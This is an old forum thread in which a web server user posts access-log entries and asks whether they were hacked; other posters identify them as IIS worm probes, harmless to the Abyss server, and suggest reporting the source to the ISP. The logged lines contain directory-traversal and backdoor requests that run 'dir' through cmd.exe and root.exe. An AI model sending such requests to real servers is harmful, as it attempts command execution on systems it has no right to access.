HACKER ATTACK????

[karanaulakh]

hi, in the acess.log file i seen this entry...please help what is it??? ...it looks like someone hacked into my system via abyss and messing up thingson my drives....
how do i stop it from occuring again


24.34.12.9 - - [29/Mar/2004:14:59:20 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 223 "" ""
24.34.12.9 - - [29/Mar/2004:14:59:23 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 223 "" ""
24.34.12.9 - - [29/Mar/2004:14:59:26 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
24.34.12.9 - - [29/Mar/2004:14:59:30 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
24.34.12.9 - - [29/Mar/2004:14:59:33 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
24.34.12.9 - - [29/Mar/2004:14:59:36 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
24.34.12.9 - - [29/Mar/2004:14:59:39 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""

[nquin321]

Those are old hacks for iis web server. Don't worry those won't do anything to the abyss web server or your hard drives.

[wembassy]

Please report the ip to the authorities so they can catch the guy, even though benine it would good to stop him before he finds a way in your system. Not to mention keep him away from everyone elses systems.

[iNaNimAtE]

Usually that isn't a guy doing it. It is a worm. Chances are, the guy doesn't even know that his computer is doing it. There is no need to inform the authorities.
_________________
Bienvenidos!

[jmoschetti45]

Authorities no, ISP yes. Most ISPs I've contacted about this problem will require their user to remove the worm. Some even remove the account if they don't fix it.
_________________
http://jmoschetti45.com